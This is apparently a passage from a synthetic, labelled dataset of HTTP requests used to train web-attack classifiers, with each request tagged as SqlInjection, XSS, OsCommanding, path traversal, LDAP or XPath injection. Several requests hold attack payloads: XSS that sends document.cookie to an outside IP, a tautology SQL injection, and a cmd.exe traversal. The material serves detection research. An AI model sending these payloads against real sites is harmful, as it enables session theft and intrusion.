If-Modified-Since: Thu, 28 Jan 10 07:51:02 UTC
If-Unmodified-Since: Mon, 08 Nov 04 09:49:41 GMT
If-Match: "l2ue9yd3wxpNBql1v"
If-None-Match: "zRYCdW.U6j90Ek39"
If-Range: "nhfYEa5epnA9YaC"
Max-Forwards: 35
MIME-Version: 2.2
Pragma: rfnj9='q'
Proxy-Authorization: 5s1k thjftN=9ldw
Authorization: Digest cnonce="eHrzno0l"
Range: 4509-,62-022408,-4198
Referer: /woeZ/hautu/aTF1/jlsnOsd/Csni.js
TE: trailers,deflate,trailers
Trailer: Date
User-Agent: Mozilla/5.5 (Windows; U; Win 9x 2.3; lR-is; rv:4.1.7) Gecko/48548801
UA-CPU: MIPS
UA-Disp: 0773,9723,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 738x118
Via: 0.7 www.aT8ca4ri.htm
Transfer-Encoding: atams; eeonr=i4etmno
Upgrade: rht/5.4
Warning: 367 www.allm.jpg "DIddrxa" "Wed, 23 Jun 04 20:22:35 UTC"
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 9168693821015244526
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

einursAto1tr=2902&tDosei=to7i&tsHesaCtg1w5dt=769&LW5PWJhsystemsystemQ=laemEetiphphipe&rv5bpy=wgP&ea6=ba~(oi1&oaaeaww=dageUahyp7un&Eg='    OR ''  = '&lRets65=% e&TaDeheiwstfs4o=sesi

End - Id: 41424
Start - Id: 36798
class: OsCommanding
GET /ewo_Al-Oe-yW/7E0aNdn0pzI6oofOf/glitso4/j.d/sdpivci9ue/nebflarrsirm4rps3Aow/4mWteqgoibs6/c5-8fAmQRFhnohA9/nMmxmyUDA6ee.shtml?MqlEsLpbz0cV=%5Cnls++++%2Froot%2F HTTP/1.1
Host: www.ndihc.net:80
Connection: close
Accept: */*
Accept-Charset: iso-2022-jp, euc-kr;q=0.6, x-mac-turkish, iso-2022-jp
Accept-Encoding: 
Accept-Language: haaotc-es;q=0.0, etLt1n-ftE;q=0.3, ete-63sseub, ey6Eode6-eiHilAh;q=0.2, sraatx-t;q=0.6
Cache-Control: no-store
Client-ip: 215.243.66.219
Cookie: sD7cnl=k;ArclzwcDaLalox=06207701;ip4=7sa;wM0i=tlnu8u;AJHG=08vrex;ncCunrlawaDy2ir=nn6
Cookie2: $Version="08"
Date: Sun, 25 Sep 05 08:31:27 CET
ETag: W/"8334JjPUOIE_-tVFu"
Expect: sid9n=eluiuds;m3ishri=rjmr
From: wsCala@r0ragpmo.de
If-Modified-Since: Tue, 02 Sep 08 21:53:29 GMT
If-Unmodified-Since: Mon, 19 Apr 10 16:03:18 GMT
If-Match: *
If-None-Match: "Aif7YJnnT6Pe-lSeVYHD"
If-Range: Sun, 28 Sep 08 14:04:53 CET
Max-Forwards: 36
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: ul8wy wpHmreh=nsssH2
Authorization: Digest qop=auth
Range: -696,54746-
Referer: http://www.2en8aain.fr/iatesmso/zxwe.rar
TE: trailers,trailers
Trailer: Upgrade
User-Agent: siwTsrqtah/7.4.3.4
UA-CPU: PowerPC
UA-Disp: 9579,9287,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 232x1783
Via: 3.2 www.eitw.htm, ess/9.1 www.syhgu.jpg, HTTP/0.1 www.emmjrti.css
Transfer-Encoding: compress
Upgrade: taos/1.4
Warning: 870 www.spydgb.jpg "hrhsaomoChmoogw" 
X-Forwarded-For: 37.3.209.174
X-Serial-Number: 51873709956197
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36798
Start - Id: 44951
class: PathTransversal
GET /x8pE@E/jX1t99znWO/Iix163oToj/ttWz/gFvy-9j@C1lSRro/hVV.gif?hof7d2Dlwi=bdtssa0Fekesid&agso=doc%28++++file%3A%2F%2F%2Fc%3A%2Frem%2FSxapa.xml+++%29&lnzre3ooaaesirt=at+&32dh7aHB=22815&1qnrmotRorevR=iar%2F&ptc6sgGec=obtmrtosAtts&g8D4=23&n5wsi9dzdeto7o=7cAm6bEmlN4i&ea=125842&xnjnn0Aiut6=de7g&wie=7564127&2lc=6&YRz4d.Y=otpoi&6b=0&b5dhxto=umhte7raeiqan1iea HTTP/1.0
Host: www.eaeijt6o.cz
Connection: close
Accept: application/*
Accept-Charset: windows-1257;q=0.0, utf-8, iso-10646-ucs-2, x-mac-icelandic, iso-8859-7
Accept-Encoding: *;q=0.2
Accept-Language: weayeT-as;q=0.9, tmS-aelN;q=0.3, diee-rt;q=0.1, eie-Qustry;q=0.4
Cache-Control: max-stale
Client-ip: 155.3.34.105
Cookie: narvosay=rov8;e8snn1=ce<u;lmu=53;4eefi=sWdc77p
Cookie2: $Version="009"
Date: Fri, 05 Sep 08 19:51:43 UTC
ETag: W/"eXLaXWzgwViq5Mu"
Expect: 6qmSi
If-Modified-Since: Sun, 13 Nov 05 08:30:55 CET
If-Unmodified-Since: Sat, 18 Jun 05 06:40:36 UTC
If-Match: *
If-None-Match: "iQ7FoCUhFbkVaQymC"
If-Range: Thu, 03 Sep 09 11:25:01 CET
Max-Forwards: 3
MIME-Version: 1.3
Pragma: twtt='Da4it'
Authorization: NTLM Mnk3YW9BaWVhZ3BvdTV1czRuZGxuY3ZyNVNpdGQzeGxhWmVu
Range: -88570,-966140
Referer: /ia9c9/irtehrO0.msf
TE: trailers,trailers
Trailer: User-Agent
User-Agent: akreakxbhgosto
UA-CPU: x86
UA-Pixels: 298x509
Via: 7.3 109.211.76.111
Transfer-Encoding: compress
Upgrade: oatfTn/9.9, osaa5/4.2
Warning: 890 89.223.20.139:8441 "dEo8yE4ioSfe6tTu6" 
X-Serial-Number: 908789768
----: ------------------------------------------

null

End - Id: 44951
Start - Id: 47242
class: XSS
GET /iIe7x5@Vb4@JgWG/serei1ilgydtnb/5BQgoJ/Ob1.exe?ree0=ttacobject&0ucnq2ixoibl7v=Uzh4ePit&n3oy=ioto&1ievdjlhesyy=Ceots7tamlizao&OqZ7CYE79=5fw&nn6Tiooinhtne=%3Cdiv+style++%3D%22+background-image%3A++++url%28javascript%3A+%5Bwindow.open%28%27http%3A%2F%2F131.59.254.217%2Feltoge.msf%27%2Bdocument.cookie%29%3B%5D%29%3B++%22++%3E&te=32490&Amrqj=xRtk%261+&chleroi=hhntnielrcaiesr3ob HTTP/1.1
Host: www.qtelh4FTSn.be
Connection: close
Accept: application/zip;q=0.2, audio/*;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: deflate, compress, gzip;q=0.0, compress;q=0.9
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 189.169.187.15
Cookie: Heiooc=iscC8;td4rlosmhrrznq=otUq@sAUI;caom=30;5wp-.Cd=01;Uptenojr=uAqLKC0cujn
Cookie2: $Version="66"
Date: Sat, 08 Aug 09 09:43:06 GMT
ETag: "5vTe1bZxzLc.pyDKOkp."
Expect: noia
From: npuaaot@jotm34.net
If-Modified-Since: Tue, 04 Sep 07 07:51:14 CET
If-Unmodified-Since: Wed, 20 Oct 04 16:03:54 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 56
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: 6ndit medexEq=belmLsj
Authorization: Digest nonce
Range: -3
Referer: http://ddeSr.org/oelanvSw.jsp
TE: trailers,trailers,gzip
Trailer: Max-Forwards
User-Agent: Mozilla/4.2 (X11; U; Linux i386 3.4; em-le; rv:3.8.6) Gecko/89101467
UA-CPU: Sparc
UA-Disp: 390,072,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 077x3740
Via: HTTP/4.8 www.1rmIlfe.js, HTTP/0.9 www.q03r.js:8, 2aae/0.4 www.wao7.tiff
Transfer-Encoding: identity
Upgrade: ebpgud/5.5, uo6ys/3.0, eeei/3.0, wOU/7.9
Warning: 251 www.taxrnnd.gif "iiny34ticovcwraUhzn" 
X-Forwarded-For: 47.247.175.175
X-Serial-Number: 81818061997454
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47242
Start - Id: 35438
class: SqlInjection
GET /9r9/nteedelaO7vram/920TTwzHaP.gCAZtd/qri.swf?nciBasq=xOM1QInY&qK5P5=%27select+++customer_phone++++%27%7C%7C%27from+customers+%27%7C%7C%27where++customer_surname%3D%27%27%27%7C%7C+++++lv_surname%7C%7C%27%27%27+++and+++customer_type%3D1%27%3B&_G9vFhp=55710512&Qrnituc7e7cti=nckuY7bVjJ&i7el3vnRlgtees=761&tsoennittttu=sTho6Oe&ubunn=aoree%28snteeo%3C%3E%5Cemochal%25uj&fadEg=mselectpasswd&cotlvql=nyCD5zze%40ha&doeaeed=TyhxH&lsscocCa=69325&hbor8ebom=erTevhtaccesc&MdUw-C=14327 HTTP/1.0
Host: 69.42.35.196
Connection: close
Accept: application/x-tar, audio/*;q=0.7
Accept-Charset: euc-kr;q=0.1, cp-950;q=0.4, iso-8859-8-i;q=0.7, iso-8859-1;q=0.6
Accept-Encoding: identity, identity;q=0.5, compress
Accept-Language: *;q=0.1
Client-ip: 99.67.58.74
Date: Wed, 01 Dec 04 18:27:16 UTC
ETag: W/"nASq0ABvGV0u-AENmPf"
Expect: axrytcd=m9guio;mhhrit
If-Modified-Since: Thu, 11 Dec 08 01:47:54 UTC
If-Unmodified-Since: Fri, 11 Jun 04 24:50:59 CET
If-Match: "nPsztvwa1VS9WM5etvdp"
Authorization: Digest uri=/antim23/olgkep.gif
Referer: /Exunswm/uegiwe/riaeanh/s9Id8awe.pdf
User-Agent: Mozilla/7.1 (compatible; MSIE 7.1; Mac OS X; dt6r)
UA-Pixels: 714x0950
Via: 8.4 121.196.245.213
Transfer-Encoding: deflate

null

End - Id: 35438
Start - Id: 46877
class: XSS
PUT /o5UFazzOs0o3/e@hKJ13LlWdZAWlju/o4Hxp_n_divyBgXz/dxMg89Pvs/sA2TqaZRVjmWbCK_g_t@/.wBHCinputcHstdin.jpg? HTTP/1.1
Content-Length: 109
Content-Language: nfwde,inht,SS
Content-Encoding: deflate
Content-Location: http://www.torCeded.org/srbajrs.bin
Content-MD5: T1RlUmZ5ZWFzcm1uaXdlaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 14 Apr 07 18:53:00 UTC
Last-Modified: Mon, 25 Sep 06 14:12:26 GMT
Host: www.ii2a.fr
Connection: close
Accept: audio/basic
Accept-Charset: windows-1253;q=0.8, iso-8859-2, windows-1250, windows-1255, x-mac-cyrillic;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 89.81.27.19
Cookie: P8eslanoeg=sebWNaarth
Cookie2: $Version="8"
Date: Fri, 09 Jul 04 02:44:05 UTC
ETag: "qpH2R-@HEM1V6hUP"
Expect: eimHsos=aoe09mew;tEeut=cmfm
From: xorersew@0i1thu.fr
If-Modified-Since: Thu, 04 Feb 10 16:49:13 UTC
If-Unmodified-Since: Fri, 08 May 09 05:57:59 CET
If-Match: "jJM02KeP8B2r3rl"
If-None-Match: *
If-Range: *
Max-Forwards: 855
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic amFib2lrQWY6bWVxOHNyZA==
Authorization: Digest nonce
Range: -692,548156-61437,-79
Referer: http://o5etoMr.uk/ma4feew/c7L5m/dnj6hemb.bin
TE: trailers,trailers,chunked
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.6 (Machintosh; U; PPC Mac OS X 4.7; n5-ex; rv:8.9.3) Gecko/30847980
UA-CPU: x86
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2245x173
Via: HTTP/5.0 62.205.116.88:87
Transfer-Encoding: ms8en
Upgrade: nteIn/8.4, ihne/7.6, mbtti/6.3, lts/2.7
Warning: 479 70.40.194.240 "olAdtnTro" "Wed, 14 Apr 10 22:00:41 UTC"
X-Forwarded-For: 213.211.107.254
X-Serial-Number: 93268691782079750245
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

LwNEVRN=<img  src ="tomerarila> "  onmouseover    ="  [alert('cuo');]     " >

End - Id: 46877
Start - Id: 42868
class: OsCommanding
GET /lVC.nsf?Rt=eYe19D&afLea=oi8a-ynhi&daeloadlb4p5ezw=%7C+++++dir+++++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C+%2C HTTP/1.1
Host: www.thsre.com
Connection: r2ddntiA
Accept: */*
Accept-Charset: cp-950;q=0.2, x-mac-arabic;q=0.8, euc-cn;q=0.2
Accept-Encoding: *
Accept-Language: Msoe3se-b, ed9hz3p-i04h;q=0.8, xsi0cb-w;q=0.7
Cache-Control: only-if-cached
Client-ip: 4.100.41.101
Cookie: sftt=ene
Cookie2: $Version="28"
Date: Sat, 08 Aug 09 18:41:02 CET
ETag: W/"DFX@tZVgvg@-RMrr"
Expect: 100-continue
From: rltnk@9tih3Enaa.uk
If-Modified-Since: Fri, 04 May 07 15:04:40 UTC
If-Unmodified-Since: Wed, 25 Jul 07 06:03:25 UTC
If-Match: "h@lY-hNGBxDnlKEd2KF"
If-None-Match: "itbkoKekDZKviwV"
If-Range: Sat, 17 Apr 10 19:04:22 UTC
Max-Forwards: 1666
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic YXNmZDp0bW84dHo=
Authorization: Basic djZpOGk6YW5jaGQ1aWU=
Range: -64,-955
Referer: http://www.Aaon.net/Ricwrnne/ea02asa/vkenrnr/ythejALs.pdf
TE: deflate;q=0.8,trailers
Trailer: Via
User-Agent: anrc0/3.4
UA-CPU: x86
UA-Disp: 0286,0560,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 625x3364
Via: HTTP/7.8 3.36.6.54, HTTP/5.7 159.70.36.254
Transfer-Encoding: ehna; 9x6nd=eghuec
Upgrade: gveGs/4.5, yshrh/3.9, mYo/3.1
Warning: 323 162.27.151.212 "63fpil54l" 
X-Forwarded-For: 209.98.157.41
X-Serial-Number: 646833
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 42868
Start - Id: 49803
class: XPathInjection
GET /eida/owiunxq.gif?taswiau8elDk=533945419&feTqx3osehdedI2=cu+a%28tegc%5B-s&Wb4kwM1@X=sin%2FIde%2Fanis1t%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D644%5D++++or+++%27srheyc%27%3D++%27&dBCsz.IB-Ok=heotHneegtkec0No&V2P6b7Hstdin=8%26seu&g7jBp7=fnpioaxatuesytsrnE HTTP/1.1
Host: www.oeQn.be:7453
Connection: keep-alive
Accept: image/png
Accept-Charset: *;q=0.3
Accept-Encoding: deflate;q=0.9
Accept-Language: *
Cache-Control: no-transform
Client-ip: 41.236.97.233
Cookie: or81nl=onictkchjaysetf2rt;dnIlrev=4686759367
Cookie2: $Version="71"
Date: Sun, 02 Dec 07 08:39:37 CET
ETag: "kdW8H_eGzQ8nREBeLA"
Expect: 100-continue
From: ee6oai1@Beatdr.com
If-Modified-Since: Fri, 31 Aug 07 10:15:36 CET
If-Unmodified-Since: Sun, 05 Nov 06 15:18:36 GMT
If-Match: *
If-None-Match: "pGRGra8HOg7T2Qr2"
If-Range: *
Max-Forwards: 58
MIME-Version: 8.4
Pragma: semyhzhs='smdtl'
Proxy-Authorization: Digest nonce
Authorization: creww rhlhoo=anoa
Range: 1-,586-,-3399
Referer: http://www.ta0ssh.fr/oGnsd/cseieGs/rsds.mdb
TE: deflate,deflate,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/0.8 (Windows; U; Win 9x 4.8; ri-ip; rv:8.1.1) Gecko/95736237
UA-CPU: x86
UA-Disp: 662,518,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 172x6984
Via: coiw/4.4 117.47.202.149, 4.4 32.48.92.239, 2.4 226.113.93.253:8
Transfer-Encoding: deflate
Upgrade: oticr3/9.7
Warning: 295 41.145.9.69 "ali9sAg6ha" 
X-Forwarded-For: 153.197.11.133
X-Serial-Number: 09611302404410791541
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49803
Start - Id: 44370
class: OsCommanding
GET ..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 236.167.173.11:6698
Connection: csei
Accept: image/*;q=0.8
Accept-Charset: cp-932
Accept-Encoding: 
Accept-Language: 8ihctsf-sc;q=0.5, e-c;q=0.7
Cache-Control: min-fresh=1278
Client-ip: 5.40.112.96
Cookie: meilfiiue6grl=291561649;dSgroup byo3hLaccess_logYdl9=492260;BfRVO@.81R=cOdROL;e6hi8QtdupoNdh=en64tRN;tgmnssnaauDust=4;okobe=8saHacEeyhph~bn
Cookie2: $Version="768"
Date: Wed, 07 Jan 04 01:13:40 GMT
ETag: W/"o4@mSRlI7dOqkgmEd"
Expect: p4ymocrd
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Thu, 05 Nov 09 01:53:09 UTC
If-Unmodified-Since: Sat, 01 Dec 07 03:58:54 GMT
If-Match: "5gRCiYfPue.f_e2"
If-None-Match: *
If-Range: "usvv7nHn.nQv.BAuoaKB"
Max-Forwards: 91
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM b2xlcHdha2VhZGNvZGV5b2lvaWRzUTl0UDJtcG93cnU2bTA=
Authorization: Digest qop=auth
Range: -39,698-
Referer: http://tsnhh.gov/6hoasssa/j9rinf.php4
TE: gzip;q=0.8
Trailer: Cache-Control
User-Agent: silbIwn/0.1.7.7
UA-CPU: x86
UA-Disp: 0327,603,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 347x4806
Via: FTP/6.3 www.reee7liC.js:50, dslln/3.8 205.80.169.104:62862
Transfer-Encoding: compress
Upgrade: HeiarI/6.4, enio/6.7, DHqogf/0.4
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 94309776768789
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44370
Start - Id: 37226
class: LdapInjection
GET /jOe1Ch5hZunj/ScD6jAP/t.aGhhaeJWi@g/skz@xF1/roifkplawyiAsDet2aye.png?HPN.mUxp_nodeV8=968083597&sfHtnhvtAmhtnqv=eoCn%24&ee=tTadall&uaevm1p1lbuoeel=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&Idn4s2eaSEs=e6YSTTufTz&dDrlhzaiiopsYo=uPthJ&peocUnvnuf42=i7thgetaoaDeemigiz&9o3oonk=ioruHa9sblMe&ecnNslhh2h=672585&GnsrneoFAe=ruk&W36sfOP=0vRyz%40 HTTP/1.1
Host: 64.68.191.195:74630
Connection: mdf5adli
Accept: */*;q=0.0
Accept-Charset: iso-8859-1;q=0.0, x-mac-hebrew, iso-8859-3, euc-tw
Accept-Encoding: gzip;q=0.2, deflate;q=0.1, identity
Accept-Language: haoy-o, gahxe-3pbyy;q=0.5, oaef-6, nsexdne-z;q=0.0
Cache-Control: min-fresh=45
Client-ip: 194.117.51.43
Cookie: laec0s=51
Cookie2: $Version="057"
Date: Sat, 21 Nov 09 06:39:58 UTC
ETag: "czNQPVvyxU6hhOg3"
Expect: eesgne
From: soETt@snjTsesiy.ch
If-Modified-Since: Wed, 28 Jun 06 19:04:43 UTC
If-Unmodified-Since: Wed, 03 Nov 04 15:46:55 CET
If-Match: "UheVQ0s7cPPUNYaKK"
If-None-Match: *
If-Range: Thu, 25 Nov 04 14:47:14 GMT
Max-Forwards: 9843
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="eteseefo"
Authorization: Basic ZUFyYzpod2Q4b3loYw==
Range: -035
Referer: http://www.eoIi.net/DeHtare/slXtxt2/neCq.css
TE: deflate;q=0.0,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/2.3 (compatible; MSIE 2.6; SunOS sun4u; encyeto3)
UA-CPU: x86
UA-Disp: 5765,446,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0874x8291
Via: 8.1 www.osniapu.css, nnpfg/8.0 213.147.44.108
Transfer-Encoding: gzip
Upgrade: TrRiy/4.3, rsibt/9.4
Warning: 444 71.101.94.149:869 "e5eslcsyoIxfqbnaAe" 
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 9354462419781975
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37226
Start - Id: 49273
class: XPathInjection
GET /Jtn/2lhmcxo48/nfaooAdUqiSt7hC.jsp?pmEZtjcJw5=etmgaisltnmmvebom&brzeacLldiefoah=alltneNc73xmlig3o&skj=Ehlog&RhomeincludekpsY4ZhrP=%2Feoh4+%25ohiy9&tygdoe=4&a9nensmna8lr=kHhmn%2FrnD%2FT%2Fchild%3A%3Anode%28%29%5B+++++position%28%29%3D71%5D+++%7C++fnt%2FrDEAer%2Fhsvs%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D2%5D++or+++%27dw%27++%3D%27&Ndwcpeeew=7&esdoigstqnUn=oeuoemar9dRjy&EtzoaeI81ztdc6x=733288&Q7VTexprocessing-instructionftp6=eaat&4a2a=53868853&otpgATdehlra=bbEYiHM&um943S=lscageI%7EanOne-il&euKesn9rCNsar=uoir6iasrts HTTP/1.0
Host: 234.230.54.233:60946
Connection: noiepoC
Accept: */*;q=0.6
Accept-Charset: iso-8859-8-i;q=0.8, isiri-3342;q=0.5, cp-932;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: max-age=7
Client-ip: 88.174.167.80
Cookie: nzr=:ibetweene+
Cookie2: $Version="93"
Date: Wed, 04 Jan 06 20:59:57 GMT
ETag: W/"JPmR9_9ZPrUkFgwSt4"
Expect: nimaee=lNou1m
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Wed, 09 Aug 06 17:21:09 GMT
If-Unmodified-Since: Thu, 08 Dec 05 14:42:54 CET
If-Match: *
If-None-Match: "Mf-kzJuWaJ1-kct"
If-Range: Sat, 14 Jun 08 02:04:55 UTC
Max-Forwards: 10
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: NTLM ZWFTNWlvZXFpZXV0YWhuMHVuZGhhZG9xZXEwNW4wbmtkbnFu
Authorization: Basic bmRhb25TYkw6Y2U0cg==
Range: 590547-,3238-58700
Referer: http://musyn.st/odtat/oertgool.tar.gz
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/3.7 (compatible; Konqueror/0.0; Linux i586; mebLOkA; Rffb4ed)
UA-CPU: StrongARM
UA-Disp: 3091,890,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 666x0440
Via: HTTP/1.1 91.202.249.237, HTTP/4.7 163.149.206.210:7, 2et/7.7 39.92.236.201
Transfer-Encoding: identity
Upgrade: iedn/7.3, nh9e/5.6, 2l7Pr/8.1
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 188.15.164.72
X-Serial-Number: 15070707581939695
----: ----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49273
Start - Id: 44890
class: PathTransversal
GET /t-gV4-r/tS6E1z/tZStmpAGcopyEHv1Bg/mx@s@zw/scdahefn4Rls3lhieg1/documentno/sdbnireaaiVn/CndivFf24dFAB/PnJl/c5HSCCm.css?UCDmLprocessing-instructionQ0KbN=.%2F..%2F.%2F..%2F&idrttenbegm=547361479&rimln=eb%29&ti=rl HTTP/1.0
Host: 136.215.152.175
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: oedml='oR'
Client-ip: 149.248.17.62
Cookie: teee14ku=1wgeten6;6Q8HKZAhttpsAw=h@linputtSh0oiie;neioehuiatEw7s=1157
Cookie2: $Version="973"
Date: Wed, 05 Mar 08 19:27:26 UTC
ETag: W/"tIHhbmSuiGV1mULHe7Fs"
Expect: eaqhh8
From: tshh@2vatra.org
If-Modified-Since: Wed, 14 Feb 07 07:17:28 UTC
If-Unmodified-Since: Fri, 18 Jun 04 15:55:03 GMT
If-Match: *
If-None-Match: "YwPpLdZ1bO4bAKEHs"
If-Range: "WJMJSyHCJK6nZXzKG"
Max-Forwards: 9895
MIME-Version: 2.7
Pragma: le=qab
Proxy-Authorization: Digest opaque="nwijehr"
Authorization: Basic bWNscXU6Z3BkdGRv
Range: -129
Referer: http://sdu9y.it/5ttEma/talm.mp3
TE: trailers,chunked,gzip
Trailer: Via
User-Agent: evxrv4n (sq-aC4)
UA-CPU: x86
UA-Disp: 4734,136,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6797x3315
Via: 4.7 www.cllssyk.tiff
Transfer-Encoding: tsio
Upgrade: a04E/0.2, dOen6p/3.6
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 44890
Start - Id: 47462
class: XSS
GET /9b1liis/iqJ4HJ1Aw@veGSeoK/gl.html?a9e4eatoesj=%3Cobject++++classid+%3D%22clsid%3A...++++%22++codebase+++%3D+%22+++++javascript%3A+%5Bwindow.open%28%27http%3A%2F%2F212.236.103.161%2Fnina.nsf%27%2Bdocument.cookie%29%3B%5D+++%22%3E HTTP/1.0
Host: www.nfWkt.de
Connection: close
Accept: text/plain;q=0.9, image/png
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.0
Cache-Control: ee=smcD
Client-ip: 146.143.28.253
Cookie: ateoeLeTiw=2594;kDmEd=a2mi5p: tn;inrld00emitR=uMCm
Cookie2: $Version="305"
Date: Mon, 07 Sep 09 08:28:12 GMT
ETag: W/"UCqG8sTrPrBsCcr7vUF"
Expect: 100-continue
From: eskhrz@f8eyrrtmw.biz
If-Modified-Since: Sun, 09 May 04 22:25:54 UTC
If-Unmodified-Since: Fri, 29 Sep 06 12:24:47 CET
If-Match: "dsqezla3Zlk5Dna"
If-None-Match: "4NEEF35Sl6w6@8JZ"
If-Range: *
Max-Forwards: 6099
MIME-Version: 9.9
Pragma: iiu=rioxn
Proxy-Authorization: ohttg htuneE=et8ju
Authorization: Basic ZXVvb2dzOmJzME9kbA==
Range: 9547-817639
Referer: http://www.Hrhes.uk/OTESns/9r2non/earmJim/eno02tm.tar.gz
TE: trailers,trailers,chunked
Trailer: From
User-Agent: jnrttE/1.0
UA-CPU: MIPS
UA-Disp: 2372,1267,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4671x382
Via: HTTP/2.4 www.2vR7e.gif:6022, FTP/6.7 149.195.146.20, vsci/3.7 203.216.187.72:888
Transfer-Encoding: compress
Upgrade: rshhh0/1.3
Warning: 308 www.aenio10r.gif "lnesbftg" "Sun, 10 Aug 08 14:30:39 UTC"
X-Forwarded-For: 250.184.177.153
X-Serial-Number: 48112496441051
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47462
Start - Id: 36960
class: LdapInjection
GET /gq1zKc4Ussl/tG9zCf.Rm7n555/eI0KmF/8DH/sCRKall/e7t0FmIuea4.b2WYg0T/4eh9PFu.jpg?dtryaHpunu=%29+%28++%7C%28displayName%3Dhad*%29+%28name++%3D+++had*++++%29%28++++mail%3Dhad*+%29 HTTP/1.1
Host: www.dsdlossn.biz
Connection: close
Accept: */*;q=0.4
Accept-Charset: utf-8
Accept-Encoding: gzip, gzip;q=0.0
Accept-Language: 9hue-c;q=0.4, gttiyhat-OIthqee;q=0.9, ie-isayspae;q=0.8, uugnXeic-o;q=0.3
Cache-Control: max-age=0354
Client-ip: 113.131.200.174
Cookie: rsl9tn=eedlae4an;y4GB=ht|u
Cookie2: $Version="041"
Date: Fri, 07 Jan 05 07:02:39 UTC
ETag: W/"0hNPjWgcQZJH5il"
Expect: erhfrxn=tA8teDd;dhrutcnn
From: ooeh@nqieoausen.gov
If-Unmodified-Since: Wed, 16 Dec 09 01:32:15 UTC
If-Match: *
If-Range: Thu, 27 Aug 09 17:17:46 UTC
Max-Forwards: 92
Pragma: atmIa=xmmn1aa0
Authorization: Basic dXFzZWxoZjpkaWlzU2Vt
Range: 84-,-422477,1197-5319
Referer: http://uamTc0e.gov/tommccst/hoxse/iuhmofS/1doN/uu5SaxTu.mdb
TE: deflate;q=0.5,trailers
Trailer: Range
User-Agent: Mozilla/0.9 (Machintosh; U; Mac OS X 7.1; mt-n2; rv:9.1.5) Gecko/66495115
UA-CPU: Sparc
UA-Pixels: 8538x2200
Upgrade: voikit/1.2
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36960
Start - Id: 42407
class: SqlInjection
GET /m3guNgFB9YEs/oY-FXr/kko2Ucymieqp1epExdre.jpg?irn0i=9023446257&aticPnna=ef8&s94wdhhte=ueOiteemsiwdh&riosanitbwi=%3DonctE+d%2Fspm&ae28roctitc5etw=gguh&dyheosJltWa=+mc&K8ZyuyQIEr5=eic%27%7Coihfnps%25r&krehnabniAo8tH=OR+++++%27isa%27+IN+++%28++%27++%27+++%29&6ean=776225305 HTTP/1.1
Host: 120.178.53.68
Connection: close
Accept: video/*;q=0.9
Accept-Charset: *
Accept-Encoding: gzip;q=0.5, gzip, deflate;q=0.3, deflate;q=0.8, identity
Accept-Language: 2Eoudd-n;q=0.2
Cache-Control: max-stale=8325
Client-ip: 161.232.72.123
